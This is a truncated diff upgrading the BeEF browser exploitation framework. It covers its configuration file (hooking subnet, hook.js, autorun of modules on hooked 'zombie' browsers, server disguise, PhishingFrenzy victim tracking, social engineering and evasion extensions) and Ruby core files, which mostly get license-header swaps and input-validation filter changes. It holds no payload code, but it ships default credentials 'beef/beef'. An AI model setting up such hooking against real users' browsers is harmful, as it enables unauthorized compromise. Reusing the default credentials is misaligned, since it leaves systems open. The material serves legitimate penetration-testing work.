-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # BeEF Configuration file

 beef:
-    version: '0.4.3.1-alpha'
+    version: '0.4.6.0-alpha'
+    # More verbose messages (server-side)
    debug: false
+    # More verbose messages (client-side)
+    client_debug: false
+    # Used for generating secure tokens
+    crypto_default_value_length: 80

+    # Interface / IP restrictions
    restrictions:
-        # subnet of browser ip addresses that can hook to the framework 
+        # subnet of IP addresses that can hook to the framework
        permitted_hooking_subnet: "0.0.0.0/0"
-        # subnet of browser ip addresses that can connect to the UI 
-        # permitted_ui_subnet = "127.0.0.1/32"
+        # subnet of IP addresses that can connect to the admin UI
+        #permitted_ui_subnet: "127.0.0.1/32"
        permitted_ui_subnet: "0.0.0.0/0"
-    
+
+    # HTTP server
    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "3000"
-        # if running behind a nat set the public ip address here
-        #public: ""
-        dns: "localhost"
-        panel_path: "/ui/panel"
+
+        # Decrease this setting to 1,000 (ms) if you want more responsiveness
+        #  when sending modules and retrieving results.
+        # NOTE: A poll timeout of less than 5,000 (ms) might impact performance
+        #  when hooking lots of browsers (50+).
+        # Enabling WebSockets is generally better (beef.websocket.enable)
+        xhr_poll_timeout: 5000
+
+        # Reverse Proxy / NAT
+        # If BeEF is running behind a reverse proxy or NAT
+        #  set the public hostname and port here
+        #public: ""      # public hostname/IP address
+        #public_port: "" # experimental
+
+        # DNS
+        dns_host: "localhost"
+        dns_port: 53
+
+        # Web Admin user interface URI
+        web_ui_basepath: "/ui"
+
+        # Hook
        hook_file: "/hook.js"
        hook_session_name: "BEEFHOOK"
        session_cookie_name: "BEEFSESSION"

+        # Allow one or multiple origins to access the RESTful API using CORS
+        # For multiple origins use: "http://browserhacker.com, http://domain2.com"
+        restful_api:
+            allow_cors: false
+            cors_allowed_domains: "http://browserhacker.com"
+
+        # Prefer WebSockets over XHR-polling when possible.
+        websocket:
+            enable: false
+            port: 61985 # WS: good success rate through proxies
+            # Use encrypted 'WebSocketSecure'
+            # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
+            secure: true
+            secure_port: 61986 # WSSecure
+            ws_poll_timeout: 1000 # poll BeEF every second
+
+        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
+        web_server_imitation:
+            enable: true
+            type: "apache" # Supported: apache, iis, nginx
+
+        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
+        https:
+            enable: false
+            # In production environments, be sure to use a valid certificate signed for the value
+            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
+            key: "beef_key.pem"
+            cert: "beef_cert.pem"
+
    database:
        # For information on using other databases please read the
        # README.databases file

        # supported DBs: sqlite, mysql, postgres
+        # NOTE: you must change the Gemfile adding a gem require line like:
+        #   gem "dm-postgres-adapter"
+        # or
+        #   gem "dm-mysql-adapter"
+        # if you want to switch drivers from sqlite to postgres (or mysql).
+        # Finally, run a 'bundle install' command and start BeEF.
        driver: "sqlite"

        # db_file is only used for sqlite
        db_file: "beef.db"
-        
+
        # db connection information is only used for mysql/postgres
        db_host: "localhost"
+        db_port: 5432
        db_name: "beef"
        db_user: "beef"
        db_passwd: "beef123"
        db_encoding: "UTF-8"

-    crypto_default_value_length: 80
+    # Credentials to authenticate in BeEF.
+    # Used by both the RESTful API and the Admin_UI extension
+    credentials:
+        user:   "beef"
+        passwd: "beef"
+
+    # Autorun modules as soon the browser is hooked.
+    # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
+    autorun:
+        enable: true
+        # set this to TRUE if you want to allow auto-run execution for modules with target->user_notify
+        allow_user_notify: true
+
+    # Enables DNS lookups on zombie IP addresses
+    dns_hostname_lookup: false
+
+    # IP Geolocation
+    # NOTE: requires MaxMind database:
+    #   curl -O http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
+    #   gunzip GeoLiteCity.dat.gz && mkdir /opt/GeoIP && mv GeoLiteCity.dat /opt/GeoIP
+    geoip:
+        enable: false
+        database: '/opt/GeoIP/GeoLiteCity.dat'
+
+    # Integration with PhishingFrenzy
+    # If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
+    # to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
+    integration:
+        phishing_frenzy:
+            enable: false

    # You may override default extension configuration parameters here
    extension:
        requester:
-            enable: true 
+            enable: true
        proxy:
-            enable: true 
+            enable: true
+            key: "beef_key.pem"
+            cert: "beef_cert.pem"
        metasploit:
            enable: false
+        social_engineering:
+            enable: true
+        evasion:
+            enable: false
        console:
-            shell:
+             shell:
                enable: false
+        ipec:
+            enable: true
+        # this is still experimental, we're working on it..
+        dns:
+            enable: true
--- a/core/api.rb
+++ b/core/api.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
@@ -60,10 +50,9 @@ module BeEF
      # @param [String] method the method of the class
      # @param [Array] params an array of parameters that need to be matched
      # @return [Boolean] whether or not the owner is registered
-      # @todo Change the param matching to use the new :is_matched_params?() method - Issue #479
      def registered?(owner, c, method, params = [])
        @registry.each{|r|
-          if r['owner'] == owner and r['class'] == c and r['method'] == method and params == r['params']
+          if r['owner'] == owner and r['class'] == c and r['method'] == method and self.is_matched_params?(r, params)
            return true
          end
        }
@@ -166,7 +155,7 @@ module BeEF
                if not result == nil
                  data << {:api_id => mod[:id], :data => result}
                end
-              rescue Exception => e
+              rescue => e
                print_error "API Fire Error: #{e.message} in #{mod.to_s}.#{method.to_s}()"
              end
            end
--- a/core/api/extension.rb
+++ b/core/api/extension.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
--- a/core/api/extensions.rb
+++ b/core/api/extensions.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module API
--- a/core/api/main/configuration.rb
+++ b/core/api/main/configuration.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module API
--- a/core/api/main/migration.rb
+++ b/core/api/main/migration.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module API
--- a/core/api/main/network_stack/assethandler.rb
+++ b/core/api/main/network_stack/assethandler.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module API
--- a/core/api/main/server.rb
+++ b/core/api/main/server.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module API
--- a/core/api/main/server/hook.rb
+++ b/core/api/main/server/hook.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module API
--- a/core/api/module.rb
+++ b/core/api/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module API
--- a/core/api/modules.rb
+++ b/core/api/modules.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module API
--- a/core/bootstrap.rb
+++ b/core/bootstrap.rb
@@ -0,0 +1,52 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+
+  end
+end
+
+## @note Include the BeEF router
+require 'core/main/router/router'
+require 'core/main/router/api'
+
+
+## @note Include http server functions for beef
+require 'core/main/server'
+require 'core/main/handlers/modules/beefjs'
+require 'core/main/handlers/modules/command'
+require 'core/main/handlers/commands'
+require 'core/main/handlers/hookedbrowsers'
+require 'core/main/handlers/browserdetails'
+
+# @note Include the network stack
+require 'core/main/network_stack/handlers/dynamicreconstruction'
+require 'core/main/network_stack/handlers/redirector'
+require 'core/main/network_stack/handlers/raw'
+require 'core/main/network_stack/assethandler'
+require 'core/main/network_stack/api'
+
+# @note Include the distributed engine
+require 'core/main/distributed_engine/models/rules'
+
+## @note Include helpers
+require 'core/module'
+require 'core/modules'
+require 'core/extension'
+require 'core/extensions'
+require 'core/hbmanager'
+
+## @note Include RESTful API
+require 'core/main/rest/handlers/hookedbrowsers'
+require 'core/main/rest/handlers/modules'
+require 'core/main/rest/handlers/categories'
+require 'core/main/rest/handlers/logs'
+require 'core/main/rest/handlers/admin'
+require 'core/main/rest/handlers/server'
+require 'core/main/rest/api'
+
+## @note Include Websocket
+require 'core/main/network_stack/websocket/websocket'
--- a/core/core.rb
+++ b/core/core.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
@@ -26,16 +16,15 @@ require 'core/main/models/hookedbrowser'
 require 'core/main/models/log'
 require 'core/main/models/command'
 require 'core/main/models/result'
-require 'core/main/models/dynamiccommandinfo'
-require 'core/main/models/dynamicpayloadinfo'
-require 'core/main/models/dynamicpayloads'
 require 'core/main/models/optioncache'
+require 'core/main/models/browserdetails'

 # @note Include the constants
 require 'core/main/constants/browsers'
 require 'core/main/constants/commandmodule'
 require 'core/main/constants/distributedengine'
 require 'core/main/constants/os'
+require 'core/main/constants/hardware'

 # @note Include core modules for beef
 require 'core/main/configuration'
@@ -44,20 +33,11 @@ require 'core/main/crypto'
 require 'core/main/logger'
 require 'core/main/migration'

-# @note Include http server functions for beef
-require 'core/main/server'
+# @note Include the command line parser and the banner printer
+require 'core/main/console/commandline'
+require 'core/main/console/banners'

-require 'core/main/handlers/modules/beefjs'
-require 'core/main/handlers/modules/command'
+# @note Include rubyzip lib
+require 'zip'

-require 'core/main/handlers/commands'
-require 'core/main/handlers/hookedbrowsers'
-
-# @note Include the network stack
-require 'core/main/network_stack/handlers/dynamicreconstruction'
-require 'core/main/network_stack/assethandler'
-require 'core/main/network_stack/api'
-
-# @note Include the distributed engine
-require 'core/main/distributed_engine/models/rules'

--- a/core/extension.rb
+++ b/core/extension.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module Extension
--- a/core/extensions.rb
+++ b/core/extensions.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module Extensions
--- a/core/filters.rb
+++ b/core/filters.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module Filters
--- a/core/filters/base.rb
+++ b/core/filters/base.rb
@@ -1,21 +1,11 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Filters
-  
+
  # Check if the string is not empty and not nil
  # @param [String] str String for testing
  # @return [Boolean] Whether the string is not empty
@@ -34,7 +24,7 @@ module Filters
    regex = Regexp.new('[^' + chars + ']')
    regex.match(str).nil?
  end
-        
+
  # Check if one or more characters in 'chars' are in 'str'
  # @param [String] chars List of characters to match
  # @param [String] str String for testing
@@ -43,7 +33,7 @@ module Filters
    regex = Regexp.new(chars)
    not regex.match(str).nil?
  end
-        
+
  # Check for null char
  # @param [String] str String for testing
  # @return [Boolean] If the string has a null character
@@ -108,14 +98,58 @@ module Filters
    return false if not is_non_empty_string?(str)
    only?("a-zA-Z0-9", str)
  end
-        
-  # Check if valid ip address string
-  # @param [String] ip String for testing
-  # @return [Boolean] If the string is a valid IP address
-  # @note only IPv4 compliant
-  def self.is_valid_ip?(ip)
-    return false if not is_non_empty_string?(ip)
-    return true if ip =~ /^(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})?$/
+
+  # @overload self.is_valid_ip?(version, ip)
+  #   Checks if the given string is a valid IP address
+  #   @param [Symbol] version IP version (either <code>:ipv4</code> or <code>:ipv6</code>)
+  #   @param [String] ip string to be tested
+  #   @return [Boolean] true if the string is a valid IP address, otherwise false
+  #
+  # @overload self.is_valid_ip?(ip)
+  #   Checks if the given string is either a valid IPv4 or IPv6 address
+  #   @param [String] ip string to be tested
+  #   @return [Boolean] true if the string is a valid IPv4 or IPV6 address, otherwise false
+  def self.is_valid_ip?(version = :both, ip)
+    valid = false
+
+    if is_non_empty_string?(ip)
+      valid = case version.inspect.downcase
+        when /^:ipv4$/
+          ip =~ /^((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}
+            (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])$/x
+        when /^:ipv6$/
+          ip =~ /^(([0-9a-f]{1,4}:){7,7}[0-9a-f]{1,4}|
+            ([0-9a-f]{1,4}:){1,7}:|
+            ([0-9a-f]{1,4}:){1,6}:[0-9a-f]{1,4}|
+            ([0-9a-f]{1,4}:){1,5}(:[0-9a-f]{1,4}){1,2}|
+            ([0-9a-f]{1,4}:){1,4}(:[0-9a-f]{1,4}){1,3}|
+            ([0-9a-f]{1,4}:){1,3}(:[0-9a-f]{1,4}){1,4}|
+            ([0-9a-f]{1,4}:){1,2}(:[0-9a-f]{1,4}){1,5}|
+            [0-9a-f]{1,4}:((:[0-9a-f]{1,4}){1,6})|
+            :((:[0-9a-f]{1,4}){1,7}|:)|
+            fe80:(:[0-9a-f]{0,4}){0,4}%[0-9a-z]{1,}|
+            ::(ffff(:0{1,4}){0,1}:){0,1}
+            ((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}
+            (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|
+            ([0-9a-f]{1,4}:){1,4}:
+            ((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}
+            (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))$/ix
+        when /^:both$/
+          is_valid_ip?(:ipv4, ip) || is_valid_ip?(:ipv6, ip)
+      end ? true : false
+    end
+
+    valid
+  end
+
+  # Checks if string is a valid domain name
+  # @param [String] domain string for testing
+  # @return [Boolean] If the string is a valid domain name
+  # @note Only validates the string format. It does not check for a valid TLD since ICANN's list of
+  #       TLD's is not static.
+  def self.is_valid_domain?(domain)
+    return false unless is_non_empty_string?(domain)
+    return true if domain =~ /^[0-9a-z-]+(\.[0-9a-z-]+)*(\.[a-z]{2,}).?$/i
    false
  end

@@ -148,6 +182,6 @@ module Filters
    return false if str.length > 200
    true
  end
-  
+
 end
 end
--- a/core/filters/browser.rb
+++ b/core/filters/browser.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Filters
@@ -22,7 +12,7 @@ module Filters
  def self.is_valid_browsername?(str)
    return false if not is_non_empty_string?(str)
    return false if str.length > 2
-    return false if has_non_printable_char?(str)  
+    return false if has_non_printable_char?(str)
    true
  end

@@ -32,7 +22,7 @@ module Filters
  def self.is_valid_browsertype?(str)
    return false if not is_non_empty_string?(str)
    return false if str.length < 10
-    return false if str.length > 50
+    return false if str.length > 500 #CxF - had to increase this because the Chrome detection JSON String is getting bigger.
    return false if has_non_printable_char?(str)
    true
  end
@@ -42,7 +32,17 @@ module Filters
  # @return [Boolean] If the string has valid Operating System name characters
  def self.is_valid_osname?(str)
    return false if not is_non_empty_string?(str)
-    return false if has_non_printable_char?(str) 
+    return false if has_non_printable_char?(str)
+    return false if str.length < 2
+    true
+  end
+
+  # Check the Hardware name value - for example, 'iPhone'
+  # @param [String] str String for testing
+  # @return [Boolean] If the string has valid Hardware name characters
+  def self.is_valid_hwname?(str)
+    return false if not is_non_empty_string?(str)
+    return false if has_non_printable_char?(str)
    return false if str.length < 2
    true
  end
@@ -52,7 +52,7 @@ module Filters
  # @return [Boolean] If the string has valid browser version characters
  def self.is_valid_browserversion?(str)
    return false if not is_non_empty_string?(str)
-    return false if has_non_printable_char?(str)  
+    return false if has_non_printable_char?(str)
    return true if str.eql? "UNKNOWN"
    return false if not nums_only?(str) and not is_valid_float?(str)  
    return false if str.length > 10      
@@ -64,7 +64,7 @@ module Filters
  # @return [Boolean] If the string has valid browser / ua string characters
  def self.is_valid_browserstring?(str)
    return false if not is_non_empty_string?(str)
-    return false if has_non_printable_char?(str)    
+    return false if has_non_printable_char?(str)
    return false if str.length > 300      
    true
  end
@@ -73,16 +73,16 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid cookie characters
  def self.is_valid_cookies?(str)
-    return false if has_non_printable_char?(str)    
+    return false if has_non_printable_char?(str)
    return false if str.length > 2000
    true
  end

-  # Verify the screen params are valid
+  # Verify the screen size is valid
  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid screen param characters
-  def self.is_valid_screen_params?(str)
-    return false if has_non_printable_char?(str)    
+  # @return [Boolean] If the string has valid screen size characters
+  def self.is_valid_screen_size?(str)
+    return false if has_non_printable_char?(str)
    return false if str.length > 200
    true
  end
@@ -91,7 +91,7 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid window size characters
  def self.is_valid_window_size?(str)
-    return false if has_non_printable_char?(str)    
+    return false if has_non_printable_char?(str)
    return false if str.length > 200
    true
  end
@@ -105,6 +105,25 @@ module Filters
    true
  end

+  # Verify the date stamp is valid
+  # @param [String] str String for testing
+  # @return [Boolean] If the string has valid date stamp characters
+  def self.is_valid_date_stamp?(str)
+    return false if has_non_printable_char?(str)
+    return false if str.length > 200
+    true
+  end
+
+  # Verify the CPU type string is valid
+  # @param [String] str String for testing
+  # @return [Boolean] If the string has valid CPU type characters
+  def self.is_valid_cpu?(str)
+    return false if not is_non_empty_string?(str)
+    return false if has_non_printable_char?(str)
+    return false if str.length > 200
+    true
+  end
+
  # Verify the browser_plugins string is valid
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid browser plugin characters
@@ -114,9 +133,9 @@ module Filters
    return true if not is_non_empty_string?(str)
    return false if str.length > 1000
    if RUBY_VERSION >= "1.9" && str.encoding === Encoding.find('UTF-8')
-      return (str =~ /[^\w\d\s()-.,;_!\302\256]/u).nil?
+      return (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
    else
-      return (str =~ /[^\w\d\s()-.,;_!\302\256]/n).nil?
+      return (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?
    end
  end

--- a/core/filters/command.rb
+++ b/core/filters/command.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Filters
--- a/core/filters/http.rb
+++ b/core/filters/http.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
